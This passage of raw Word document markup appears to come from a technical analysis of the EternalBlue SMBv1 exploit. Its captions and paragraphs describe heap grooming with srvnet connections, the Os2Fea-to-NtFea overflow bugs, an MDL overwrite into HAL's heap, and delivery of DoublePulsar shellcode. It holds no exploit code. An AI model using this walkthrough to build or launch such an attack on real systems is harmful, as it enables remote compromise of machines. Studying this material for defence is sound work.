      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Only Os2Fea transmission open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="4CC9CD6C" w14:textId="617ECC50" w:rsidR="00863F67" w:rsidRDefault="00863F67" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58710D80" w14:textId="2E40699B" w:rsidR="00863F67" w:rsidRPr="00863F67" w:rsidRDefault="00863F67" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4B3D3" w14:textId="77777777" w:rsidR="00E2381A" w:rsidRDefault="00E2381A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34871062" w14:textId="77777777" w:rsidR="00E2381A" w:rsidRDefault="00E2381A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517EDB51" w14:textId="66651C82" w:rsidR="00E2381A" w:rsidRDefault="009813B9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E2381A">
        <w:t>SMB_COM_NT_TRANSACT fills part of Os2Fea which is later replaced by SMB_COM_NT_TRANSACT_SECONDARY or SMB_COM_TRANSACTION2_SECONDARY (Bug A and B) however the last secondary packet has not yet been sent so no OOB write has been triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B127F5D" w14:textId="3C8C5DC9" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09124C97" wp14:editId="6F169290">
            <wp:extent cx="7824081" cy="3007022"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="22225"/>
            <wp:docPr id="760259144" name="Picture 760259144"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44" name="Picture 760259144" descr="Table&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId43"/>
                    <a:srcRect l="1850" t="1538" r="447" b="-94"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7861998" cy="3021594"/>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8CFDB23" w14:textId="0A46F53E" w:rsidR="004052AF" w:rsidRDefault="004052AF" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc111363593"/>
      <w:bookmarkStart w:id="113" w:name="_Toc111363730"/>
      <w:bookmarkStart w:id="114" w:name="_Toc111981754"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Part of Os2Fea has been filled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="184929A8" w14:textId="7E2886A5" w:rsidR="004052AF" w:rsidRDefault="004052AF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C26DC3" w14:textId="04F9D27F" w:rsidR="00E2381A" w:rsidRDefault="00E2381A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0D00F7" w14:textId="77777777" w:rsidR="00E2381A" w:rsidRDefault="00E2381A" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B15B310" w14:textId="74BF4484" w:rsidR="004052AF" w:rsidRDefault="009813B9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004052AF">
        <w:t>Multiple srvnet connections are opened, increasing the chances of overwriting srvnet (the overflow)</w:t>
      </w:r>
      <w:r w:rsidR="00C47F5C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004052AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78A555" w14:textId="28E71D9A" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BF95C7F" wp14:editId="2C6F9968">
            <wp:extent cx="7098797" cy="5089865"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="15875"/>
            <wp:docPr id="760259145" name="Picture 76025914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45" name="Picture 760259145" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect l="2756" t="2375" r="707" b="2081"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7170122" cy="5141005"/>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45676DA5" w14:textId="472786D5" w:rsidR="00C47F5C" w:rsidRDefault="00C47F5C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc111363594"/>
      <w:bookmarkStart w:id="116" w:name="_Toc111363731"/>
      <w:bookmarkStart w:id="117" w:name="_Toc111981755"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Multiple srvnet connections are opened</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="52CF8306" w14:textId="38E60FDF" w:rsidR="00C47F5C" w:rsidRDefault="009813B9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C47F5C">
        <w:t>Using Bug C, a placeholder chunk is created for the converted Os2Fea to NtFea and should have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00C47F5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>incorrectly</w:t>
      </w:r>
      <w:r w:rsidR="00C47F5C">
        <w:t xml:space="preserve"> calculated size. The chunk becomes free when the connection is closed and the NtFea write OOB fills the hole when it is allocated. Before being freed new srvnet connections (srvnet chunks) are allocated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F40A5" w14:textId="77551335" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EB6D69" wp14:editId="7FAFFD35">
            <wp:extent cx="5967310" cy="4392517"/>
            <wp:effectExtent l="19050" t="19050" r="14605" b="27305"/>
            <wp:docPr id="760259146" name="Picture 76025914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46" name="Picture 760259146" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId45"/>
                    <a:srcRect l="2295" t="1558" r="712" b="1567"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5983487" cy="4404425"/>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15CECDAB" w14:textId="6B18DE59" w:rsidR="00C47F5C" w:rsidRDefault="00C47F5C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc111363595"/>
      <w:bookmarkStart w:id="119" w:name="_Toc111363732"/>
      <w:bookmarkStart w:id="120" w:name="_Toc111981756"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Bug C creating pl</w:t>
      </w:r>
      <w:r w:rsidR="00EF7076">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>ceholder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="2DE99E19" w14:textId="1AC78795" w:rsidR="007B24F0" w:rsidRDefault="009813B9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B24F0">
        <w:t>The allocation of a new srvnet chunk</w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007B24F0">
        <w:t xml:space="preserve"> located </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>adjacent</w:t>
      </w:r>
      <w:r w:rsidR="007B24F0">
        <w:t xml:space="preserve"> to the ‘Bug C chunk’ as it cannot be </w:t>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>situated</w:t>
      </w:r>
      <w:r w:rsidR="007B24F0">
        <w:t xml:space="preserve"> in the previous chunk (Bug C chunk) as it would create an overflow of this chunk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E113F" w14:textId="0EE38255" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426BC0B8" wp14:editId="6471FC51">
            <wp:extent cx="7768369" cy="4651626"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="15875"/>
            <wp:docPr id="760259147" name="Picture 76025914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47" name="Picture 760259147" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId46"/>
                    <a:srcRect t="2248"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7806451" cy="4674429"/>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490BB478" w14:textId="471759BE" w:rsidR="007B24F0" w:rsidRDefault="007B24F0" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc111363596"/>
      <w:bookmarkStart w:id="122" w:name="_Toc111363733"/>
      <w:bookmarkStart w:id="123" w:name="_Toc111981757"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: New srvnet allocation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="3C3FC3DC" w14:textId="41863C5C" w:rsidR="007B24F0" w:rsidRPr="007B24F0" w:rsidRDefault="009813B9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E2381A">
        <w:t>The Bug C chunk is freed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D0082" w14:textId="326A77CD" w:rsidR="007B24F0" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc111363597"/>
      <w:bookmarkStart w:id="125" w:name="_Toc111363734"/>
      <w:bookmarkStart w:id="126" w:name="_Toc111981758"/>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251495424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30547F62" wp14:editId="6A1223E0">
            <wp:simplePos x="933450" y="1387361"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="8342118" cy="4946457"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="26035"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="760259148" name="Picture 76025914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48" name="Picture 760259148" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId47">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="2639"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8342118" cy="4946457"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E2381A">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="007B24F0">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="007B24F0">
        <w:t>: Bug C chunk is freed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="01A7AC1D" w14:textId="55C66B37" w:rsidR="00E2381A" w:rsidRPr="00E2381A" w:rsidRDefault="009813B9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0064066F">
        <w:t>Using SMB_COM_TRANSACTION2_SECONDARY the last Os2Fea data is sent leading to conversion of Os2Fea to NtFea allocation. NtFea is allocated to placeholder. The next chunk is overwritten by NtFea modifying the 2 header properties to point to HAL’s Heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDCD47" w14:textId="2120292A" w:rsidR="009306E9" w:rsidRDefault="009306E9" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009306E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECA3380" wp14:editId="5C41C21F">
            <wp:extent cx="7263258" cy="4331152"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="12700"/>
            <wp:docPr id="760259149" name="Picture 76025914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49" name="Picture 760259149" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId48"/>
                    <a:srcRect l="2984" t="8743" b="1322"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7291270" cy="4347856"/>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69D7EC6C" w14:textId="26C6B357" w:rsidR="0064066F" w:rsidRDefault="0064066F" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc111363598"/>
      <w:bookmarkStart w:id="128" w:name="_Toc111363735"/>
      <w:bookmarkStart w:id="129" w:name="_Toc111981759"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SMB_COM_TRANSACTION2_SECONDARY is used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="248D6C80" w14:textId="559E495A" w:rsidR="0064066F" w:rsidRDefault="009813B9" w:rsidP="009813B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009D248A">
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidR="00D81B90">
        <w:t xml:space="preserve"> data from the user arrives in the overflowed srvnet connection this is written to HAL’s Heap due to the previous overwrite of MDL instead of the reserved place in the kernel pool. This new data in HAL’s Heap contains fake struct (SRVENT_RECV). (pSrvNetWskStruct points to fake struct (SRVNET-RECV)) so when the connection is closed the fake struct HandlerFunction is called. This data contains the shellcode DoublePulsar</w:t>
      </w:r>
      <w:r w:rsidR="00D81B90">
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="008A622B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885B8FE" w14:textId="4F110B45" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BEA3BBE" w14:textId="4402D485" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9FCCC1" w14:textId="7C7EEB2A" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C10AF68" w14:textId="1725FA15" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F7AE2E" w14:textId="4B3F4766" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A2E6B3" w14:textId="77777777" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2108C998" w14:textId="692A8370" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54627437" w14:textId="5C13B9F8" w:rsidR="009A4B04" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251523072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AFF2BB2" wp14:editId="38705134">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8024468</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>135497</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1375575" cy="500645"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="760259156" name="Rectangle 760259156"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1375575" cy="500645"/>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E07DC3" id="Rectangle 760259156" o:spid="_x0000_s1026" style="position:absolute;margin-left:631.85pt;margin-top:10.65pt;width:108.3pt;height:39.4pt;z-index:25152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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251504640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E3FCD8D" wp14:editId="1236DDAE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5437834</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-478557</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4274971" cy="1138066"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="24130"/>
            <wp:wrapNone/>
            <wp:docPr id="760259153" name="Picture 760259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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1385" t="14233" r="-1385" b="52490"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4274971" cy="1138066"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="C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06FF61E" w14:textId="4FC53875" w:rsidR="009A4B04" w:rsidRPr="0064066F" w:rsidRDefault="009A4B04" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251513856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63B9F1F1" wp14:editId="36F17AD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5174664</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>351286</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="742849" cy="283558"/>
                <wp:effectExtent l="0" t="133350" r="0" b="135890"/>
                <wp:wrapNone/>
                <wp:docPr id="760259155" name="Arrow: Right 760259155"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="19614080">
                          <a:off x="0" y="0"/>
                          <a:ext cx="742849" cy="283558"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightArrow">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6F6979" id="Arrow: Right 760259155" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:407.45pt;margin-top:27.65pt;width:58.5pt;height:22.35pt;rotation:-2169154fd;z-index:25151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" adj="17477" fillcolor="#c00000" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00111097">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E8F8E5" wp14:editId="5EDFD4D7">
            <wp:extent cx="7906627" cy="4759385"/>
